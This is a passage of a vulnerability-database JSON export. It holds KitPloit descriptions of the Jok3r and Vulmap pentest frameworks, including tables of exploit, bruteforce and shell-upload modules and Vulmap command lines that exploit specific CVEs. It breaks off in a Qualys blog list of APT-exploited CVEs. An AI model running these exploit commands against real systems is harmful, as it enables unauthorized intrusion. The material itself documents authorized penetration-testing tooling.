checksums) | fingerprinter |\n | fingerprinting-cms-cmsexplorer | recon | Find plugins and themes (using bruteforce) installed in a CMS (Wordpress, Drupal, Joomla, Mambo) | cmsexplorer |\n | fingerprinting-drupal | recon | Fingerprint Drupal 7/8: users, nodes, default files, modules, themes enumeration | drupwn |\n | crawling-fast | recon | Crawl website quickly, analyze interesting files/directories | dirhunt |\n | crawling-fast2 | recon | Crawl website and extract URLs, files, intel & endpoints | photon |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ssl-check | vulnscan | Check for SSL/TLS configuration | testssl |\n | vulnscan-multi-nikto | vulnscan | Check for multiple web vulnerabilities/misconfigurations | nikto |\n | default-creds-web-multi | vulnscan | Check for default credentials on various web interfaces | changeme |\n | webdav-scan-davscan | vulnscan | Scan HTTP WebDAV | davscan |\n | webdav-scan-msf | vulnscan | Scan HTTP WebDAV | metasploit |\n | webdav-internal-ip-disclosure | vulnscan | Check for WebDAV internal IP disclosure | metasploit |\n | webdav-website-content | vulnscan | Detect webservers disclosing its content through WebDAV | metasploit |\n | http-put-check | vulnscan | Detect the support of dangerous HTTP PUT method | metasploit |\n | apache-optionsbleed-check | vulnscan | Test for the Optionsbleed bug in Apache httpd (CVE-2017-9798) | optionsbleed |\n | shellshock-scan | vulnscan | Detect if web server is vulnerable to Shellshock (CVE-2014-6271) | shocker |\n | iis-shortname-scan | vulnscan | Scan for IIS short filename (8.3) disclosure vulnerability | iis-shortname-scanner |\n | iis-internal-ip-disclosure | vulnscan | Check for IIS internal IP disclosure | metasploit |\n | tomcat-user-enum | vulnscan | Enumerate users on Tomcat 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18 | metasploit |\n | jboss-vulnscan-multi | vulnscan | Scan 
JBoss application server for multiple vulnerabilities | metasploit |\n | jboss-status-infoleak | vulnscan | Queries JBoss status servlet to collect [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information>) (JBoss 4.0, 4.2.2 and 4.2.3) | metasploit |\n | jenkins-infoleak | vulnscan | Enumerate a remote Jenkins-CI installation in an unauthenticated manner | metasploit |\n | cms-multi-vulnscan-cmsmap | vulnscan | Check for vulnerabilities in CMS Wordpress, Drupal, Joomla | cmsmap |\n | wordpress-vulscan | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpscan |\n | wordpress-vulscan2 | vulnscan | Scan for vulnerabilities in CMS Wordpress | wpseku |\n | joomla-vulnscan | vulnscan | Scan for vulnerabilities in CMS Joomla | joomscan |\n | joomla-vulnscan2 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlascan |\n | joomla-vulnscan3 | vulnscan | Scan for vulnerabilities in CMS Joomla | joomlavs |\n | drupal-vulnscan | vulnscan | Scan for vulnerabilities in CMS Drupal | droopescan |\n | magento-vulnscan | vulnscan | Check for misconfigurations in CMS Magento | magescan |\n | silverstripe-vulnscan | vulnscan | Scan for vulnerabilities in CMS Silverstripe | droopescan |\n | vbulletin-vulnscan | vulnscan | Scan for vulnerabilities in CMS vBulletin | vbscan |\n | liferay-vulnscan | vulnscan | Scan for vulnerabilities in CMS Liferay | liferayscan |\n | angularjs-csti-scan | vulnscan | Scan for AngularJS Client-Side Template Injection | angularjs-csti-scanner |\n | jboss-deploy-shell | exploit | Try to deploy shell on JBoss server (jmx|web|admin-console, JMXInvokerServlet) | jexboss |\n | struts2-rce-cve2017-5638 | exploit | Exploit Apache Struts2 Jakarta Multipart parser RCE (CVE-2017-5638) | jexboss |\n | struts2-rce-cve2017-9805 | exploit | Exploit Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805) | struts-pwn-cve2017-9805 |\n | struts2-rce-cve2018-11776 | exploit | Exploit Apache Struts2 
[misconfiguration](<https://www.kitploit.com/search/label/Misconfiguration>) RCE (CVE-2018-11776) | struts-pwn-cve2018-11776 |\n | tomcat-rce-cve2017-12617 | exploit | Exploit for Apache Tomcat JSP Upload Bypass RCE (CVE-2017-12617) | exploit-tomcat-cve2017-12617 |\n | jenkins-cliport-deserialize | exploit | Exploit Java deserialization in Jenkins CLI port | jexboss |\n | weblogic-t3-deserialize-cve2015-4852 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2015-4852) | loubia |\n | weblogic-t3-deserialize-cve2017-3248 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2017-3248) | exploit-weblogic-cve2017-3248 |\n | weblogic-t3-deserialize-cve2018-2893 | exploit | Exploit Java deserialization in Weblogic T3(s) (CVE-2018-2893) | exploit-weblogic-cve2018-2893 |\n | weblogic-wls-wsat-cve2017-10271 | exploit | Exploit WLS-WSAT in Weblogic - CVE-2017-10271 | exploit-weblogic-cve2017-10271 |\n | drupal-cve-exploit | exploit | Check and exploit CVEs in CMS Drupal 7/8 (include Drupalgeddon2) (require user interaction) | drupwn |\n | bruteforce-domino | bruteforce | Bruteforce against IBM/Lotus Domino server | domiowned |\n | bruteforce-wordpress | bruteforce | Bruteforce Wordpress accounts | wpseku |\n | bruteforce-joomla | bruteforce | Bruteforce Joomla account | xbruteforcer |\n | bruteforce-drupal | bruteforce | Bruteforce Drupal account | xbruteforcer |\n | bruteforce-opencart | bruteforce | Bruteforce Opencart account | xbruteforcer |\n | bruteforce-magento | bruteforce | Bruteforce Magento account | xbruteforcer |\n | web-path-bruteforce-targeted | bruteforce | Bruteforce web paths when language is known (extensions adapted) (use raft wordlist) | dirsearch |\n | web-path-bruteforce-blind | bruteforce | Bruteforce web paths when language is unknown (use raft wordlist) | wfuzz |\n | web-path-bruteforce-opendoor | bruteforce | Bruteforce web paths using OWASP OpenDoor wordlist | wfuzz |\n | wordpress-shell-upload | postexploit | Upload shell 
on Wordpress if admin credentials are known | wpforce |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n\n[ ](<https://draft.blogger.com/null>) \n** Java-RMI (default 1099/tcp) ** \n\n \n \n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Attempt to dump all objects from Java-RMI service | nmap |\n | rmi-enum | recon | Enumerate RMI services | barmie |\n | jmx-info | recon | Get information about JMX and the MBean server | twiddle |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | jmx-bruteforce | bruteforce | Bruteforce creds to connect to JMX registry | jmxbf |\n | exploit-rmi-default-config | exploit | Exploit default config in RMI Registry to load classes from any remote URL (not working against JMX) | metasploit |\n | exploit-jmx-insecure-config | exploit | Exploit JMX insecure config. Auth disabled: should be vuln. Auth enabled: vuln if weak config | metasploit |\n | jmx-auth-disabled-deploy-class | exploit | Deploy malicious MBean on JMX service with auth disabled (alternative to msf module) | sjet |\n | tomcat-jmxrmi-deserialize | exploit | Exploit Java-RMI deserialize in Tomcat (CVE-2016-8735, CVE-2016-8735), req. 
JmxRemoteLifecycleListener | jexboss |\n | rmi-deserialize-all-payloads | exploit | Attempt to exploit Java deserialize against Java RMI Registry with all ysoserial payloads | ysoserial |\n | tomcat-jmxrmi-manager-creds | postexploit | Retrieve Manager creds on Tomcat JMX (req. auth disabled or creds known on JMX) | jmxploit |\n +--------------------------------+-------------+--------------------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** JDWP (default 9000/tcp) ** \n\n \n \n +------------+----------+-----------------------------------------------------+-----------------+\n | Name | Category | Description | Tool used |\n +------------+----------+-----------------------------------------------------+-----------------+\n | nmap-recon | recon | Recon using Nmap JDWP scripts | nmap |\n | jdwp-rce | exploit | Gain RCE on JDWP service (show OS/Java info as PoC) | jdwp-shellifier |\n +------------+----------+-----------------------------------------------------+-----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** MSSQL (default 1433/tcp) ** \n\n \n \n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap MSSQL scripts | nmap |\n | mssqlinfo | recon | Get technical information about a remote MSSQL server (use TDS protocol and SQL browser Server) | msdat |\n | common-creds | bruteforce | Check common/default credentials on MSSQL server | msdat |\n | bruteforce-sa-account | bruteforce | Bruteforce MSSQL \"sa\" account | msdat |\n | audit-mssql-postauth | postexploit | Check permissive privileges, 
methods allowing command execution, weak accounts after authenticating on MSSQL | msdat |\n +-----------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** MySQL (default 3306/tcp) ** \n\n \n \n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | Name | Category | Description | Tool used |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n | nmap-recon | recon | Recon using Nmap MySQL scripts | nmap |\n | mysql-auth-bypass-cve2012-2122 | exploit | Exploit password bypass vulnerability in MySQL - CVE-2012-2122 | metasploit |\n | default-creds | bruteforce | Check default credentials on MySQL server | patator |\n | mysql-hashdump | postexploit | Retrieve usernames and password hashes from MySQL database (req. 
creds) | metasploit |\n | mysql-interesting-tables-columns | postexploit | Search for interesting tables and columns in database | jok3r-scripts |\n +----------------------------------+-------------+-------------------------------------------------------------------------+---------------+\n\n[ ](<https://draft.blogger.com/null>) \n** Oracle (default 1521/tcp) ** \n\n \n \n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n | tnscmd | recon | Connect to TNS Listener and issue commands Ping, Status, Version | odat |\n | tnspoisoning | vulnscan | Test if TNS Listener is vulnerable to TNS Poisoning (CVE-2012-1675) | odat |\n | common-creds | bruteforce | Check common/default credentials on Oracle server | odat |\n | bruteforce-creds | bruteforce | Bruteforce Oracle accounts (might block some accounts !) 
| odat |\n | audit-oracle-postauth | postexploit | Check for privesc vectors, config leading to command execution, weak accounts after authenticating on Oracle | odat |\n | search-columns-passwords | postexploit | Search for columns storing passwords in the database | odat |\n +--------------------------+-------------+--------------------------------------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** PostgreSQL (default 5432/tcp) ** \n\n \n \n +---------------+------------+------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +---------------+------------+------------------------------------------------+-----------+\n | default-creds | bruteforce | Check default credentials on PostgreSQL server | patator |\n +---------------+------------+------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** RDP (default 3389/tcp) ** \n\n \n \n +----------+----------+-----------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +----------+----------+-----------------------------------------------------------------------+------------+\n | ms12-020 | vulnscan | Check for MS12-020 RCE vulnerability (any Windows before 13 Mar 2012) | metasploit |\n +---------+----------+-----------------------------------------------------------------------+------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SMB (default 445/tcp) ** \n\n \n \n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n | nmap-recon | recon | Recon using Nmap SMB 
scripts | nmap |\n | anonymous-enum-smb | recon | Attempt to perform enum (users, shares...) without account | nullinux |\n | nmap-vulnscan | vulnscan | Check for vulns in SMB (MS17-010, MS10-061, MS10-054, MS08-067...) using Nmap | nmap |\n | detect-ms17-010 | vulnscan | Detect MS17-010 SMB RCE | metasploit |\n | samba-rce-cve2015-0240 | vulnscan | Detect RCE vuln (CVE-2015-0240) in Samba 3.5.x and 3.6.X | metasploit |\n | exploit-rce-ms08-067 | exploit | Exploit for RCE vuln MS08-067 on SMB | metasploit |\n | exploit-rce-ms17-010-eternalblue | exploit | Exploit for RCE vuln MS17-010 EternalBlue on SMB | metasploit |\n | exploit-sambacry-rce-cve2017-7494 | exploit | Exploit for SambaCry RCE on Samba <= 4.5.9 (CVE-2017-7494) | metasploit |\n | auth-enum-smb | postexploit | Authenticated enumeration (users, groups, shares) on SMB | nullinux |\n | auth-shares-perm | postexploit | Get R/W permissions on SMB shares | smbmap |\n | smb-exec | postexploit | Attempt to get a remote shell (psexec-like, requires Administrator creds) | impacket |\n +-----------------------------------+-------------+-------------------------------------------------------------------------------+------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SMTP (default 25/tcp) ** \n\n \n \n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n | smtp-cve | vulnscan | Scan for vulnerabilities (CVE-2010-4344, CVE-2011-1720, CVE-2011-1764, open-relay) on SMTP | nmap |\n | smtp-user-enum | vulnscan | Attempt to perform user enumeration via SMTP commands EXPN, VRFY and RCPT TO | smtp-user-enum |\n 
+----------------+----------+--------------------------------------------------------------------------------------------+----------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SNMP (default 161/udp) ** \n\n \n \n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | Name | Category | Description | Tool used |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n | common-community-strings | bruteforce | Check common community strings on SNMP server | metasploit |\n | snmpv3-bruteforce-creds | bruteforce | Bruteforce SNMPv3 credentials | snmpwn |\n | enumerate-info | postexploit | Enumerate information provided by SNMP (and check for write access) | snmp-check |\n +--------------------------+-------------+---------------------------------------------------------------------+------------+\n\n[ ](<https://draft.blogger.com/null>) \n** SSH (default 22/tcp) ** \n\n \n \n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n | vulns-algos-scan | vulnscan | Scan supported algorithms and security info on SSH server | ssh-audit |\n | user-enumeration-timing-attack | exploit | Try to perform OpenSSH (versions <= 7.2 and >= 5.*) user enumeration timing attack OpenSSH | osueta |\n | default-ssh-key | bruteforce | Try to authenticate on SSH server using known SSH keys | changeme |\n | default-creds | bruteforce | Check default credentials on SSH | patator |\n +--------------------------------+------------+--------------------------------------------------------------------------------------------+-----------+\n\n[ 
](<https://draft.blogger.com/null>) \n** Telnet (default 21/tcp) ** \n\n \n \n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | Name | Category | Description | Tool used |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n | nmap-recon | recon | Recon using Nmap Telnet scripts | nmap |\n | default-creds | bruteforce | Check default credentials on Telnet (dictionary from https://cirt.net/passwords) | patator |\n | bruteforce-root-account | bruteforce | Bruteforce \"root\" account on Telnet | patator |\n +-------------------------+------------+----------------------------------------------------------------------------------+-----------+\n\n[ ](<https://draft.blogger.com/null>) \n** VNC (default 5900/tcp) ** \n\n \n \n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap VNC scripts | nmap |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) 
| vuln-databases |\n | bruteforce-pass | bruteforce | Bruteforce VNC password | patator |\n +-----------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n \n \n\n\n** [ Download Jok3R ](<https://github.com/koutto/jok3r>) **\n", "edition": 20, "modified": "2019-01-23T12:25:12", "published": "2019-01-23T12:25:12", "id": "KITPLOIT:5052987141331551837", "href": "http://www.kitploit.com/2019/01/jok3r-network-and-web-pentest-framework.html", "title": "Jok3R - Network And Web Pentest Framework", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-25T15:23:36", "bulletinFamily": "tools", "cvelist": ["CVE-2017-9791", "CVE-2020-2551", "CVE-2019-6340", "CVE-2011-3923", "CVE-2018-7600", "CVE-2013-1966", "CVE-2020-14882", "CVE-2020-2883", "CVE-2018-2894", "CVE-2018-20062", "CVE-2010-1428", "CVE-2019-7238", "CVE-2017-3506", "CVE-2013-2251", "CVE-2014-4210", "CVE-2017-12629", "CVE-2020-10199", "CVE-2019-0193", "CVE-2018-7602", "CVE-2015-7501", "CVE-2017-5638", "CVE-2017-10271", "CVE-2018-11776", "CVE-2017-12615", "CVE-2019-0230", "CVE-2010-1870", "CVE-2016-4437", "CVE-2017-9805", "CVE-2020-2729", "CVE-2013-2134", "CVE-2020-1938", "CVE-2019-9082", "CVE-2019-2725", "CVE-2010-0738", "CVE-2018-1000861", "CVE-2019-17558", "CVE-2017-1000353", "CVE-2016-3081", "CVE-2020-2555", "CVE-2019-2729"], "description": "[  ](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists. 
\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use; poc mode is the default. In poc mode it also supports \"-f\" batch target scanning, \"-o\" file output of results and other main functions (see [ Options ](<https://github.com/zhzyker/vulmap/#options>) or python3 vulmap.py -h). In exp mode the poc function is no longer provided: the exploit is carried out directly, and the exploit result is fed back to further verify whether the vulnerability exists and whether it can be exploited. \n\n** Try to use \"-a\" to specify the target type to reduce false positives, such as \"-a solr\" **\n\n \n\n\n### Installation \n\nThe operating system must have python3; python3.7 or higher is recommended \n\n * Installation dependency \n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows \n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options \n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. 
-o \"result.txt\")\n \n\n \n\n\n### Examples \n\nTest all vulnerabilities in poc mode \n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vulns, use the \"id\" command to test the vuln, because some Linux systems do not have the \"netstat -an\" command \n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck [ http://example.com ](<http://example.com>) for struts2 vulns \n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on [ http://example.com:7001 ](<http://example.com:7001>)\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt \n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt \n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilities List \n\nThe vulnerabilities supported by Vulmap are as follows \n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, 
cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |\n | Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |\n | Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |\n | Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |\n | Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability 
|\n | Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |\n | Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |\n | Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |\n | Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |\n | Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |\n | Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |\n | Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |\n | Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |\n | RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |\n | RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |\n | RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |\n | ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |\n | ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n \n\n \n\n\n### Docker \n \n \n docker build -t vulmap/vulmap .\n docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com\n\n \n\n\n \n \n\n\n** [ Download Vulmap ](<https://github.com/zhzyker/vulmap> 
\"Download Vulmap\" ) **\n", "edition": 1, "modified": "2020-12-25T11:30:06", "published": "2020-12-25T11:30:06", "id": "KITPLOIT:5420210148456420402", "href": "http://www.kitploit.com/2020/12/vulmap-web-vulnerability-scanning-and.html", "title": "Vulmap - Web Vulnerability Scanning And Verification Tools", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by the end of 2019. They are among the top vulnerabilities exploited by Advanced Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. 
Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group 
